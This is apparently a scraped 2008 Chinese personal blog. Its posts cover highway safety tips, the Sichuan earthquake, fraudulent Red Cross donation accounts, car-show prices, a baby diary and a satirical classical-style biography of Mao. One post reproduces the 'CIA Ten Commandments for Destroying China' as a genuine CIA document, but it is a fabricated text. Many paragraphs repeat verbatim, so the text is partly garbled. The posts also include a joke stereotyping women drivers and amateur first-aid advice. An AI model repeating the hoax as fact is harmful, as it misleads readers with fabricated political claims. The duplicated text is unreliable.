没想到这篇即兴的短文竟会写了这么多。最后,我还有几个简单的实践经验想告诉在高速公路上的司乘朋友:
1、副驾驶位上的朋友,最安全的座位是司机后面的那个座位,相信我,遇到紧急情况,司机避让自己是本能的下意识行为,你与他的上下级关系、感情甚至亲情在这里都没用。如果你是一个在后排卧铺休息的大车乘客,也请你选择将头朝向驾驶员的方向,你愿意失去一条腿还是"一个"头?这不是可选择的题目!
2、交通事故受伤致死的原因比例最高的为颅脑损伤、胸腹脏器损伤、出血过多及休克死亡;所以除非你有专业的医疗知识,在没有确定伤者伤情的情况下,最好不要轻易的移动伤员,否则,他断裂的肋骨可能就是在你的"帮助"下才插入心脏或动脉的。如果伤者四肢大出血,你可以在他出血肢体靠近心脏端的关节上方用鞋带或腰带紧止血并及时报警,这才是最重要的。
3、在高速公路上,一切非正常的行驶状态下,都要及时打开双闪灯!包括停车、前方堵路及施工、单道放行、前方发生事故、进入雾区等等。
4、高速公路上的重大肇事驾驶员的驾龄是6―8年!相信我,你没有看错,这个数据从市、省到全国都是一致的,个中原因您一定能体会。熟能生巧?熟也能生骄!
5、永远把与你同在道路上行驶的其他机动车当成菜鸟,不要把自己的生命财产安全寄希望于掌握在别人的手中。(就好像我们一看到违法行驶的女司机就赶紧躲得远一点^-^)
6、上高速公路前,要规划好线路,尽可能了解沿途的路况,给车辆加满油料并保持手机电、费充足,不然给你撂到荒郊野外,那可真是上天无路入地无门啊!
7、还有一句题外话,现在的高速公路平均50―60公里就会设置一个服务区或停车区,当您的车辆遇到小的故障或您内急时,请您坚持到服务区解决。毕竟,你的车辆不管停在紧急停车道还是加宽车道,不仅给您和他人的行车造成安全隐患,遇到夜间,还很有可能给预谋或流窜的犯罪分子提供难得的发财机会。
8、最后一个很白痴的提示:报警电话永远是110!不要在前面加区号!
无论何时牢记一句话:一个好的驾驶员,并不在他的驾车技术有多么高超,而是他的头脑中是否有安全意识。我感觉写得非常好,无论您开不开车,都应该知道这些,因为您的命也只有一条。
从此,大脑让行于身体
决定,从今天开始,大脑的优先度让行于身体。大脑总是充满着各种疑问,想要获取各种信息,解决各种各样的疑问,关心很多的问题,让自己整天整夜地坐在计算机前面,感觉太糟糕了。从现在开始,每天和小宝宝一起睡觉,搂着香喷喷的乖宝宝,早早上床睡觉,要是休息的差不多了,就在凌晨四五点钟的时候起床,打一圈拳,再起来关心那些有意思的东西。
每天的睡觉时间 22:00 - 4:00,把晚上干活时间拿到 4:15- 7:45,这样就有三个半小时了,比晚上的时间还要充裕。而且凌晨的时候,网速更快,干活更有效率啊。
从今天开始,大脑优先级降低了。活的健健康康,快快乐乐是最重要的。
每天的睡觉时间 22:00 - 4:00,把晚上干活时间拿到 4:15- 7:45,这样就有三个半小时了,比晚上的时间还要充裕。而且凌晨的时候,网速更快,干活更有效率啊。
从今天开始,大脑优先级降低了。活的健健康康,快快乐乐是最重要的。
2008年5月17日星期六
这样的人真是无耻
现在居然有人入侵了十字会官网,修改了篡改募捐帐号,还有人性吗?
附:经公安部确认的虚假募捐账号
开户名:李雅琼,开户地:河南,开户行:中国农业银行,账号:6228482080560018616;
开户名:李步九,开户行:工商银行,账号:6222002201101753792;
开户名:李步九,开户行:农业银行,账号:6228480150082864813;
开户名:李步九,开户行:建设银行,账号:6227003526450024660;
开户名:李步九,开户行:邮储银行,账号:6221886400011381263;
开户名:林玉敏,开户行:农业银行,账号:9559980150169780312。
不过中国官方的信息化建设许多都很垃圾,存在大量问题,在这样的多事之秋,可能以后还要经常出现一些问题。
附:经公安部确认的虚假募捐账号
开户名:李雅琼,开户地:河南,开户行:中国农业银行,账号:6228482080560018616;
开户名:李步九,开户行:工商银行,账号:6222002201101753792;
开户名:李步九,开户行:农业银行,账号:6228480150082864813;
开户名:李步九,开户行:建设银行,账号:6227003526450024660;
开户名:李步九,开户行:邮储银行,账号:6221886400011381263;
开户名:林玉敏,开户行:农业银行,账号:9559980150169780312。
不过中国官方的信息化建设许多都很垃圾,存在大量问题,在这样的多事之秋,可能以后还要经常出现一些问题。
2008年5月12日星期一
更正一下刚才文章有点儿错误的地方,敲的太快,没检查就发了
原文:直到接到朋友电话,还知道四川7.8级的大地震,全国大部分地区都有震感,很多地方甚至也出现严重情况。现在的中国,怎么一下子出了这么多问题呢?
今天是济南67年同期最冷的一天
改为:直到接到朋友电话,"才"知道四川7.8级的大地震,全国大部分地区都有震感,很多地方甚至也出现严重情况。现在的中国,怎么一下子出了这么多问题呢?
今天是济南"57"年同期最冷的一天
今天是济南67年同期最冷的一天
改为:直到接到朋友电话,"才"知道四川7.8级的大地震,全国大部分地区都有震感,很多地方甚至也出现严重情况。现在的中国,怎么一下子出了这么多问题呢?
今天是济南"57"年同期最冷的一天
多事之秋啊
不到一周内,也就几天的时间,前几天还在说,山东省内有440例手足口病例,然后接着是五百多例,然后是一千四百多例,今天早上收到的彩信吓我了一跳,截止5月9号24时,山东共报告手足口病4566例!!!竟然这样快?还在几周前听说安徽阜阳出现手足口病,网上传了许多贴现子,说这个地方真是怪,竟然一下子出现了这么多的手足口病,而且还隐瞒不报,阻挠记者调查。。。加上前几年闹的很厉害的大头娃娃奶粉事件,感觉阜阳这地方简直是一帮黑社会的天下了。听走南闯北的说,阜阳这地方,就是个穷的鸟不拉屎的地方,不过又在网上看到贴子,带着大大的照片,是阜阳政府盖的豪华"白宫"。网上的东西,看着也就娱乐一下,主要还得看官方怎么说。不过,上面的手足口病例,都是最近几天官方公布的数据,应该还是可信的。。
不过生活还是继续,大家已经麻木了,不是吗?
还在麻木的时候,开的这辆破车剧烈晃动了一下?这么平坦的路面,怎么会晃动呢?赶紧停车绕车一圈,好几个人仔细检查,到底是哪儿出了问题,看了半天也没研究出个结果,心里忐忑不安不地上车继续开。直到接到朋友电话,还知道四川7.8级的大地震,全国大部分地区都有震感,很多地方甚至也出现严重情况。现在的中国,怎么一下子出了这么多问题呢?
今天是济南67年同期最冷的一天,在这样的阴冷天气,我困惑痛苦我的国家和同胞遭受着这样的磨难。这一样到底来自哪里?是什么造就了这样的局面?
从最近几个月的检查结果看,大量的病毒出现了,而且很多病毒都能自动下载变种,病毒变种机发的到处都是,大量的病毒出现在网络上,网络攻击事件层出不穷。很多受害者甚至根本没有意识着,还在乐呵乐呵地继续运行着病毒呢。一个月的病毒数量,能赶上过去一二年的病毒数量了,而且危害更多,隐匿更深。真是内忧外患啊。
2008年,才五月份的时候,就发生了这么的事情,以后还会有什么?
不过生活还是继续,大家已经麻木了,不是吗?
还在麻木的时候,开的这辆破车剧烈晃动了一下?这么平坦的路面,怎么会晃动呢?赶紧停车绕车一圈,好几个人仔细检查,到底是哪儿出了问题,看了半天也没研究出个结果,心里忐忑不安不地上车继续开。直到接到朋友电话,还知道四川7.8级的大地震,全国大部分地区都有震感,很多地方甚至也出现严重情况。现在的中国,怎么一下子出了这么多问题呢?
今天是济南67年同期最冷的一天,在这样的阴冷天气,我困惑痛苦我的国家和同胞遭受着这样的磨难。这一样到底来自哪里?是什么造就了这样的局面?
从最近几个月的检查结果看,大量的病毒出现了,而且很多病毒都能自动下载变种,病毒变种机发的到处都是,大量的病毒出现在网络上,网络攻击事件层出不穷。很多受害者甚至根本没有意识着,还在乐呵乐呵地继续运行着病毒呢。一个月的病毒数量,能赶上过去一二年的病毒数量了,而且危害更多,隐匿更深。真是内忧外患啊。
2008年,才五月份的时候,就发生了这么的事情,以后还会有什么?
2008年4月15日星期二
CIA的《搞垮中国的十戒》
CIA的《搞垮中国的十戒》
1.尽量用物质来引诱和败坏他们的青年,鼓励他们藐视、鄙视、进一步公开反对他们原来所受的思想教育,特别是共产主义教条。一定要毁掉他们强调过的刻苦耐劳精神。
2.一定要尽一切可能,做好传播工作,包括电影、书籍、电视、无线电波……和新式的宗教传播。只要他们向往我们的衣、食、住、行、娱乐和教育的方式,就是成功了一半。
3.一定要把他们青年的注意力,从以政府为中心的传统引开来。
4.时常制造一些无事之事,让他们的人民公开讨论。这样就在他们的潜意识种下了分裂的种子。特别要在他们的少数民族里找机会分裂他们。
5.要不断制造消息,丑化他们的领导。
6.无论在什么场合、什么情况下,我们都要不断对他们(政府)要求民主和人权。
7.要尽量鼓励他们(政府)花费,鼓励他们向我们借贷。这样我们就有十足的把握来摧毁他们的信用,使他们的货币贬值,通货膨胀。
8.要以我们的经济和技术优势,有形无形地打击他们的工业。
9.要利用所有的资源,甚至举手投足,一言一笑,都足以破坏他们的传统价值。
10.暗地运送各种武器,装备他们的一切敌人,以及可能成为他们敌人的人们。
1.尽量用物质来引诱和败坏他们的青年,鼓励他们藐视、鄙视、进一步公开反对他们原来所受的思想教育,特别是共产主义教条。一定要毁掉他们强调过的刻苦耐劳精神。
2.一定要尽一切可能,做好传播工作,包括电影、书籍、电视、无线电波……和新式的宗教传播。只要他们向往我们的衣、食、住、行、娱乐和教育的方式,就是成功了一半。
3.一定要把他们青年的注意力,从以政府为中心的传统引开来。
4.时常制造一些无事之事,让他们的人民公开讨论。这样就在他们的潜意识种下了分裂的种子。特别要在他们的少数民族里找机会分裂他们。
5.要不断制造消息,丑化他们的领导。
6.无论在什么场合、什么情况下,我们都要不断对他们(政府)要求民主和人权。
7.要尽量鼓励他们(政府)花费,鼓励他们向我们借贷。这样我们就有十足的把握来摧毁他们的信用,使他们的货币贬值,通货膨胀。
8.要以我们的经济和技术优势,有形无形地打击他们的工业。
9.要利用所有的资源,甚至举手投足,一言一笑,都足以破坏他们的传统价值。
10.暗地运送各种武器,装备他们的一切敌人,以及可能成为他们敌人的人们。
2008年4月14日星期一
何时咱也有一块固态硬盘用啊
固态硬盘确实非常吸引人,非常省电,没有机械部件,读写速度和功耗都非常吸引人,安在稍新一些的笔记本电脑上面,启动用不了5秒就能进入系统,比原来待机进入系统还要快,这一点太棒了。啥时候咱才能用上这样的好东东,看现在的价格,短时间内恐怕不行了,16G的固态硬盘,比一台新笔记本电脑还要贵,64G的容量更是到了几万,这价格不是一般人承受不起,现在除了一些价格奇高的高端笔记本,也就在服务器领域有一些应用。
固态硬盘这么多的优点,如何低成本拥有一块自己的固态硬盘?实际可以用SD卡和CF卡自己制作一块。sd卡的价格很便宜了,4GB的现在不到二百元,多买几块做成RAID,花更少的钱就可以有一块固态硬盘用了,许多地方出售那种接口卡,可以将CF卡卡转换成IDE、pata/sata接口,大小和2.5寸硬盘差不多,可以直接换下原来的笔记本硬盘。更方便的办法,直接安装在读卡器或者USB接口上面,也可以启动系统,速度虽然不如传统硬盘,好处是没有了机械部件,不怕震动了,也没有声音了,可以放心在恶劣环境下使用。
但这些办法,都无法取代更省电、读写速度更快固态硬盘,何时咱也能拥有一块梦想中的移动硬盘啊。
固态硬盘这么多的优点,如何低成本拥有一块自己的固态硬盘?实际可以用SD卡和CF卡自己制作一块。sd卡的价格很便宜了,4GB的现在不到二百元,多买几块做成RAID,花更少的钱就可以有一块固态硬盘用了,许多地方出售那种接口卡,可以将CF卡卡转换成IDE、pata/sata接口,大小和2.5寸硬盘差不多,可以直接换下原来的笔记本硬盘。更方便的办法,直接安装在读卡器或者USB接口上面,也可以启动系统,速度虽然不如传统硬盘,好处是没有了机械部件,不怕震动了,也没有声音了,可以放心在恶劣环境下使用。
但这些办法,都无法取代更省电、读写速度更快固态硬盘,何时咱也能拥有一块梦想中的移动硬盘啊。
2008年4月12日星期六
车展回来
上午去看了车展,回来的路上想了一路,走过了路口都不知道。乱花渐欲迷人眼,车型多的看不过来。第一辆车便宜有车的功能即可,但也要基本满足商务需求,不能开出去感觉丢人,自个儿先自卑上了。夏利那车够便宜,也省油省钱,但一看那挫样,想像自己要是开这车出门见人,真不好意思见人,还不如骑个自行车有成就感,甚至不如开个QQ奥托什么的。QQ可爱,奥托精干,这样的小车还是有吸引人的地方。
车展上,有几个非常便宜物美价廉外形也不错。
QQ3,奇瑞 估价2.7万
中华骏捷、尊驰
比亚迪F3、F6 估价5.7万
哈飞路宝 估价3.7万
捷达 估价7.7万
爱丽舍,富康 5.5万
力帆520
长安奔奔
东风起亚
吉利
夏利N3
北斗星,爱迪尔
SKARK
十万左右的车,不错的有:
福克斯两厢
307两厢
307三厢
利亚纳
福美来
有许多SUV,/CUV想不到那么便宜,对这个完全不了解,要是有足够的钱,再买第二辆车的时候倒是可以玩玩,看上去很壮观很大气,显的有些暴发户的样子,呵呵,不过,只要开着爽就可以了。最低的居然只要六七万,有多款在十万以下。不知道为什么会这么便宜。
总的来说,四万以下的车有不少,五万稍有选择余地,六七万的车就不错了,最起码能开住了。有捷达,富康打底,其它的可以再看看。
比较理想的还不十万以上的车,看到有大众迈腾2.0,现场订车的特价居然只要13万。这个车非常棒
不过,要是只为了弄个车开用于代步,弄个微轿如QQ3,奥托,哈飞路宝一类的就行了
车展上,有几个非常便宜物美价廉外形也不错。
QQ3,奇瑞 估价2.7万
中华骏捷、尊驰
比亚迪F3、F6 估价5.7万
哈飞路宝 估价3.7万
捷达 估价7.7万
爱丽舍,富康 5.5万
力帆520
长安奔奔
东风起亚
吉利
夏利N3
北斗星,爱迪尔
SKARK
十万左右的车,不错的有:
福克斯两厢
307两厢
307三厢
利亚纳
福美来
有许多SUV,/CUV想不到那么便宜,对这个完全不了解,要是有足够的钱,再买第二辆车的时候倒是可以玩玩,看上去很壮观很大气,显的有些暴发户的样子,呵呵,不过,只要开着爽就可以了。最低的居然只要六七万,有多款在十万以下。不知道为什么会这么便宜。
总的来说,四万以下的车有不少,五万稍有选择余地,六七万的车就不错了,最起码能开住了。有捷达,富康打底,其它的可以再看看。
比较理想的还不十万以上的车,看到有大众迈腾2.0,现场订车的特价居然只要13万。这个车非常棒
不过,要是只为了弄个车开用于代步,弄个微轿如QQ3,奥托,哈飞路宝一类的就行了
小宝宝和车展
小宝宝四个月多点的时候,长的快起来,在外面一天回来,就会发觉小家伙似乎又长了一些胖了一些大了一些,几乎每天都有变化,和外面的春天里的花草树木,葱葱绿绿地生长着的枝牙,扬溢着一股旺盛的生命力。除了长的快,发现最近几天里总是双手握拳,拿到自己的小嘴边啃着,有时还抢过奶瓶,双手捧着,一副很是洋洋自得的样子。喝着奶,清脆的奶声奶气就会响起来,有个大头凑过来,就会对话上半天。前几天老婆同事过来玩,又出洋相了,盯着人家美女乐的不停,小眼睛漂啊漂的抛了若干媚眼。小宝宝又喜欢上一项运动,总是尝试着翻身,经常翻过了半个身子,自个儿在那儿乐的咯咯笑,仿佛完成了一项伟大成就后的自得。2008的春天,小宝宝快乐地生长。
准备买车,又满是犹豫不决,现在一切还没有走上正规,以后怎么样还不知道呢,买了车每月都有固定支出,会在现在的压力下雪上加霜。但有车的方便,有车后不一样的生活吸引着我,让人时时充满幻想,不由自主地激动着。在网上看了多个车型,还是最喜欢捷达,车子有型,省油,维护方便,另外富康也不错,驾驶灵活,也省油便宜,选来选去,还是喜欢老三样,倒是省了眼花缭乱的车型选择,反正就这三样,而且性价比还不错。也许真正决定去买的时候,还会有其它选择,不过现在这样处于每天激动的梦想里,处于现实生活的压力下,只会去选择老三样。这几天有车展,准备一会儿去看看现在漂亮的车型。车漂亮不漂亮的,对我来说,具体的功能,就是个代步工具移动的房子移动的办公环境,外型只要不是太夸张,都可以接受,只要质量稳定、安全、皮实、省油就可以了,其它的都不重要。那些漂亮的新车型,要么价格不菲,要么只是老车型的改头换面,或者连老三样的水平都达不到,大概只卖了个概念和外壳,除非激动到头脑发热非常冲动买下,否则根本不在考虑之列。不过以我的财力,动用哪怕几万块儿,也不可能一冲动就抛出的程度,和花几块钱似的。梦想里,总是睡觉睡到自然醒数钱数到手抽筋,现实里,却总是睡觉睡到手抽筋数钱数到自然醒,何时咱也能梦想照进现实啊。不过赚钱不是主要目的,温饱好解决,有着干事业去创造的心,才能走的更远吧。买车也是一样,不用三心二意,看中了的就去行动吧,比较来比较去,都差不多,跟着大流走就行吧,只是个代步工具而已,用不着抛头颅洒热血的,找这个问那个的,整的和热锅蚂蚁似的,就咱这小民的水平,还不到用车彰现个性的时候,先遮衣蔽体再说。
现在,骑上咱的俩轮,去车展欣赏去。
准备买车,又满是犹豫不决,现在一切还没有走上正规,以后怎么样还不知道呢,买了车每月都有固定支出,会在现在的压力下雪上加霜。但有车的方便,有车后不一样的生活吸引着我,让人时时充满幻想,不由自主地激动着。在网上看了多个车型,还是最喜欢捷达,车子有型,省油,维护方便,另外富康也不错,驾驶灵活,也省油便宜,选来选去,还是喜欢老三样,倒是省了眼花缭乱的车型选择,反正就这三样,而且性价比还不错。也许真正决定去买的时候,还会有其它选择,不过现在这样处于每天激动的梦想里,处于现实生活的压力下,只会去选择老三样。这几天有车展,准备一会儿去看看现在漂亮的车型。车漂亮不漂亮的,对我来说,具体的功能,就是个代步工具移动的房子移动的办公环境,外型只要不是太夸张,都可以接受,只要质量稳定、安全、皮实、省油就可以了,其它的都不重要。那些漂亮的新车型,要么价格不菲,要么只是老车型的改头换面,或者连老三样的水平都达不到,大概只卖了个概念和外壳,除非激动到头脑发热非常冲动买下,否则根本不在考虑之列。不过以我的财力,动用哪怕几万块儿,也不可能一冲动就抛出的程度,和花几块钱似的。梦想里,总是睡觉睡到自然醒数钱数到手抽筋,现实里,却总是睡觉睡到手抽筋数钱数到自然醒,何时咱也能梦想照进现实啊。不过赚钱不是主要目的,温饱好解决,有着干事业去创造的心,才能走的更远吧。买车也是一样,不用三心二意,看中了的就去行动吧,比较来比较去,都差不多,跟着大流走就行吧,只是个代步工具而已,用不着抛头颅洒热血的,找这个问那个的,整的和热锅蚂蚁似的,就咱这小民的水平,还不到用车彰现个性的时候,先遮衣蔽体再说。
现在,骑上咱的俩轮,去车展欣赏去。
2008年4月11日星期五
太祖本纪
本朝太祖毛姓名泽东字润之,湖南湘潭人氏。其寿诞之日为大清光绪十九年十一月十九日,若以公历西时记,此日为西夷之圣诞日。
帝少有大志。未冠之时即作咏蛙诗,以述其志。及少壮,游学长沙,师从杨昌济,后入京,供职于京师太学藏书阁,问学于鸿儒陈仲甫、胡适之、李守常等。适之昔日留学于美夷,恃才傲物,因帝未忝科名,适之甚轻之。适之门生傅斯年、罗家纶之辈亦甚轻帝。后帝一统天下,欲灭群儒,盖因此三人故耳。
帝受仲甫命,返湘结党,得仲甫提携,得以拜见于前朝太祖,官侍读学士。前朝太祖崩,时,前朝武厉帝为大司马大将军,阴结其党,欲灭帝党人。帝谏以兵击之,仲甫不许,武厉得以蓄积羽翼,民朝十六年武厉于松沪,前朝摄政王汪公于江夏,大杀帝党人。八月帝与诸党人会于汉口议事,帝曰:枪杆子里面出政权!众皆异之,后受命返湘,策反南军卢德铭部,九月九日兴兵起事,围长沙,不克,败走江西。军次三弯,帝重编余部,至队官皆有帝之党人监军。帝据井岗,与朱武胜公所部合兵,屡败官军,威名远扬,号朱毛军。
武厉怒,令江西巡府鲁涤平统兵十万进剿,帝诱敌深入,引兵击之,涤平败,帝擒官军先锋总兵张辉瓒。武厉闻信,令兵部尚书何应钦统兵二十万进剿,帝大败之。武厉益恐,统兵三十万再战,又败于帝。一载余,武厉又率五十万劲旅进剿。时帝因党争,被削兵权,虚职赋闲。官军犯境红朝震恐,朱武胜公与周文正公掌兵权,问计于帝,帝授奇计再破官军。武厉败绩,再整旗鼓,以西夷番将参赞军机,以百万之众犯境。时,自俄狄归国之儒生博古辈摄政,番将李德与周文正公参赞军机,博古一儒生耳,挟俄狄酋斯大林之威,夺帝兵权,唯俄狄之命是从,事无巨细,皆听命于李德。李德辈纸上谈兵,屡战屡败。引兵西走,兵渡湘水,不足三万,众将皆恶李德,兵次遵义,诸将议政,帝之威众人咸服,周文正、朱武胜公皆附之,夺博古、李德兵权,帝得以再统雄兵。
帝帅余部,转战滇、黔、川诸省。过雪山,与张国焘部合兵,国焘忌帝之官居其右,欲害帝,大将军叶剑英闻信,间道驰告帝,帝得脱。国焘部将陈昌浩欲引兵击帝,大将军徐向前拍案而起,国焘、昌浩乃罢。民朝二十四年入陕,据陕北以抗官军。官军进剿屡败于帝。帝令徐向前率所部西征,败于西北回军,丧师数万,向前等仅以身脱。丙子双十二,帝策反满洲王张学良、陕西镇守使杨虎城兵谏,囚武厉,帝使周文正公谒武厉,晓以大义,武厉罢兵。
民朝二十六年夏,倭寇兵临幽州寻衅,幽州节度使宋哲元与寇战,不克,节度副使佟麟阁、总兵赵登禹殉国,哲元败走保定,倭寇陷幽燕。帝令周文正公再谒武厉,武厉许以招安,北军三万余朱、彭为帅,辖三镇兵马,林彪、贺龙、刘伯诚为总兵。南军两万余叶、项为帅,陈毅等为统制。两军均受帝节制。时当倭军所向披靡,战无不克,独在山西平型关为帝军所败,名震中外。
合官军与倭寇血战八年,民朝三十四年倭寇败降,帝与周文正赴陪都谒武厉,共商国事。民朝三十六年兵火再起,官军伐帝。帝令大将军林彪、罗荣桓取满洲,世祖与大将军刘伯承取中原,大将军陈毅、粟裕取华东,大将军彭德怀取西北,大将军聂荣臻取幽云。帝与周文正公自帅御林军转战陕北。诸军屡败官军。民朝三十七年大将军林、罗与官军战于满洲,大破之,尽占满洲地。世祖、大将军刘与陈、粟部合兵大破官军于徐蚌,陈兵长江,民朝京师震恐。林、罗入关与大将军聂合兵,合围幽州,幽州节度使傅作义降。大将军彭横扫西北,兵临西域。帝移驾幽州,以之为都,改称北京,北方遂定。民朝乞和,帝不许,令世祖与刘、陈、粟诸将合百万众,渡长江,取金陵。以陈、粟取华东,林、罗取华中,世祖与刘将军取西南。诸军势如破竹,官军尽溃不成军。帝以世祖为西南节度使,坐镇成都,以图吐蕃。
武厉败走东海夷州,据澎湖以抗王化。民朝三十八年,太祖武帝开国元年,帝登天安门,诏告天下曰:中国人民从此站起来了!帝定鼎,君临八方。
初,倭寇败降,西夷美利坚助武厉以军资,以抗帝军,帝怒,斥之曰:美帝国主义都是纸老虎。开国元年作《别了,司徒雷登》以示美夷,夷使司徒雷登惭去。开国二年,高丽内乱,南高丽乞师西夷,美夷纠合西夷十五部落进兵北高丽,势如破竹,北高丽溃不成军。酋帅麦克阿瑟狂言饮马鸭绿水。北高丽酋长金日成乞师天朝,帝令西北王彭德怀为东征元帅,太子岸英监军。统兵二十五万,以将军邓华为先行,满洲王高岗为合后。东征高丽。彭公与美夷战,大破之。开国三年,太子阵亡,帝大怒,令彭公进兵,美夷乞和,帝不许,彭公再战,五战五捷,阵斩酋帅沃克,天下皆慑于帝之威。开国五年,彭公平美夷于高丽,班师还朝。
开国初年,帝与周文正公巡幸北狄俄罗斯,与狄酋王斯大林盟,约为兄弟之邦。国经战乱,百废待兴,帝以刘殇公为太师摄政王,周文正公为相国。免天下钱粮。世祖平定西南,传檄吐蕃,吐蕃降。征西将军王震,进兵西域,前朝西域都护陶峙岳降。帝令官军平寇,前朝余孽星散。行三反、五反,斩天津知府刘青山、河北布政使张子善等以清吏治,天下安定。
开国九年行反右,帝定奇计曰:引蛇出洞。初令天下无论军民妇孺皆可谏国事,言政弊。后将直言者尽数收监,交有司论罪。天下儒生遂不敢以古讽今,枉谈国事。行大跃进,民不聊生,饿殍千里,三年饿毙两千余万口。
俄狄发难,帝令翰林作文与俄狄论战。后会诸侯于庐山,大司马兵部尚书彭德怀谏万言书,帝怒,黜彭公,以林幽公代之。野有功高震主,鸟尽弓藏之议。吐蕃喇嘛阴兵起事,帝令军平之,达赖亡命天竺,吐蕃遂定。越数年,天竺入寇藏边,帝命镇藏节度使张国华击之,张公出奇兵越雪山,大破之,俘印军无数,天下无不慑于帝之天威。
开国十二年,天下饥荒,帝与群臣皆不食肉,以示与民共苦。会诸侯于京,曰七千人大会,帝下罪己诏。储君刘殇公曰:三分天灾,七分人祸。帝甚不悦,始有废储之意。
开国十七年,江后令大学士姚文元作《评海瑞罢官》,帝曰:阶级斗争一抓就灵!开国十八年,太祖武皇帝文革元年,天下大乱,帝于五月十六日下诏,改元文革。文革始起。林庄幽公赞太祖曰:大海航行靠舵手~~~陛下一句顶一万句~~~令天下无论妇孺老幼皆习帝之语录,舞忠字舞。每日晨起为帝作三忠于、四无限。各家均供奉帝之像,各地为帝立生祠。有山野之人作歌曰:爹亲娘亲不如陛下亲~~~帝大喜,遂立林公为储君,封摄政王,出入免跪拜。百万红卫于天安门拜谒帝,自林庄幽公、周相国等皆顿首叩拜,山呼万岁。帝下挟书律,妖言令,罢科举,焚诸子书,禁百家言。以共产之学为国学,以愚黔首。臣民偶语诗书、以古讽今者,或弃市,或收监,或黥为城旦。帝名为文革,实为灭功臣之意。
开国初,帝以高岗为东北王,饶漱石为华东王,刘伯承为西南王,林彪为中南王,彭德怀为西北王,诸王势力,人莫能及。帝行削藩策,废高、饶,以林、彭、刘等主军机,因功臣俱在,帝甚忌之,故先废高、饶,再废彭公,又以文革为名,阴使江后与林庄幽公结党戮功臣,摄政王刘殇公请乞骸骨,帝不许,后幽刘殇公于开封,密不发丧。十年大乱,计废功臣名将贺、彭等无算。
文革六年,再会诸侯于庐山,林公令大学士陈伯达谏,欲加帝尊号,帝不许。有废储之意。摄政王林庄幽公不得已谋叛,欲弑帝。帝令周文正公平叛,林公北逃,与王妃叶群、王世子立果均身死漠北。帝诏上海知府王洪文入京,加王爵。欲立为储君,因周相国、朱太师等勋臣力谏乃罢。后王洪文与江后、左丞相张春桥、大学士姚文元等结党,或受帝命,或矫诏陷害忠良。朝野共恶此四人,称之为四人帮。
文革十一年,相国周文正公薨,天下悲泣,京师万民送葬。是年四月,京师百姓进言,请加周相国尊号,配享太庙。江后不许,引发清明京师民变,江后与皇侄远新进谗言。帝以为世祖所谋,黜世祖。七月,太师朱武胜公薨,未几,地大震于唐山,丧丁二十余万口。
帝自林庄幽公之乱后,龙体日衰。文革十一年,天降星雨于吉林,地大震于唐山,民以为上将归天,人心惶惶。帝废世祖职,以右丞相华国锋为储君,赐遗诏曰:你办事,我放心。以大司马兵部尚书叶剑英为辅政王,仿刘蜀主托孤之意,委政于叶公。九月九日帝崩于寝宫,寿八十三岁,天下色变,亿万臣民俱悲,如丧考妣。国锋即位,是为废帝,新君葬太祖于天安门前,号曰:至圣革命真龙伟大导师伟大领袖伟大统帅伟大舵手太祖武皇帝。
太祖文韬武略,历代帝王所不及也。太祖文传于《太祖选集》及《太祖语录》中,诗存于《太祖诗词选》,皆官修定稿。
太祖后三人,杨后开慧,为太祖结发妻,因太祖起事,亡于前朝。贺后子珍,因不敬之罪,贬为庶民。李后云鹤又称江青,因阴结其党,欲废新君华国锋,效武则天事,为大司马辅政王叶公所废,后自缢于室。太子岸英,公子岸青,岸龙为杨后所生,公主李敏为贺后所生,公主李讷为李后所生。太子岸英阵亡,岸龙早夭,起事之时,又有子女数人,失于乱中,不知所终。诸嫔妃或有生子女者,皆不得知也。帝家有清贫之风,公子岸青,公主李讷、李敏均为布衣,唯皇孙新宇,举进士,入翰林,供职太学。
未名野人论曰:吾本燕园卑微一书生,诚惶诚恐,效董狐作良史,太史公作史记,斗胆为太祖作传。才疏学浅,无生花之笔。鄙陋之文难登大雅,故现于网络。太祖与前朝思宗武厉皇帝共逐倭奴,雪中华百年之耻。后太祖一统大业,东击美夷,北拒沙俄、西退天竺、南败越蛮诸国,扬我大汉之威;白手起家,创建百业,更研爆核弹于大漠,奠千秋之业。奈何太祖行事尤效汉高、明祖,除异己、戮功臣、兴文字狱,天下混沌。然帝坚持学、医、水利等公共福利由朝廷承担,不加民捐,至今为民所念。
帝之功过尽在民心,桃李不言,下自成蹊。
呜呼,古人作事无巨细,寂寞豪华皆有意。书生轻议冢中人,冢中笑尔书生气
帝少有大志。未冠之时即作咏蛙诗,以述其志。及少壮,游学长沙,师从杨昌济,后入京,供职于京师太学藏书阁,问学于鸿儒陈仲甫、胡适之、李守常等。适之昔日留学于美夷,恃才傲物,因帝未忝科名,适之甚轻之。适之门生傅斯年、罗家纶之辈亦甚轻帝。后帝一统天下,欲灭群儒,盖因此三人故耳。
帝受仲甫命,返湘结党,得仲甫提携,得以拜见于前朝太祖,官侍读学士。前朝太祖崩,时,前朝武厉帝为大司马大将军,阴结其党,欲灭帝党人。帝谏以兵击之,仲甫不许,武厉得以蓄积羽翼,民朝十六年武厉于松沪,前朝摄政王汪公于江夏,大杀帝党人。八月帝与诸党人会于汉口议事,帝曰:枪杆子里面出政权!众皆异之,后受命返湘,策反南军卢德铭部,九月九日兴兵起事,围长沙,不克,败走江西。军次三弯,帝重编余部,至队官皆有帝之党人监军。帝据井岗,与朱武胜公所部合兵,屡败官军,威名远扬,号朱毛军。
武厉怒,令江西巡府鲁涤平统兵十万进剿,帝诱敌深入,引兵击之,涤平败,帝擒官军先锋总兵张辉瓒。武厉闻信,令兵部尚书何应钦统兵二十万进剿,帝大败之。武厉益恐,统兵三十万再战,又败于帝。一载余,武厉又率五十万劲旅进剿。时帝因党争,被削兵权,虚职赋闲。官军犯境红朝震恐,朱武胜公与周文正公掌兵权,问计于帝,帝授奇计再破官军。武厉败绩,再整旗鼓,以西夷番将参赞军机,以百万之众犯境。时,自俄狄归国之儒生博古辈摄政,番将李德与周文正公参赞军机,博古一儒生耳,挟俄狄酋斯大林之威,夺帝兵权,唯俄狄之命是从,事无巨细,皆听命于李德。李德辈纸上谈兵,屡战屡败。引兵西走,兵渡湘水,不足三万,众将皆恶李德,兵次遵义,诸将议政,帝之威众人咸服,周文正、朱武胜公皆附之,夺博古、李德兵权,帝得以再统雄兵。
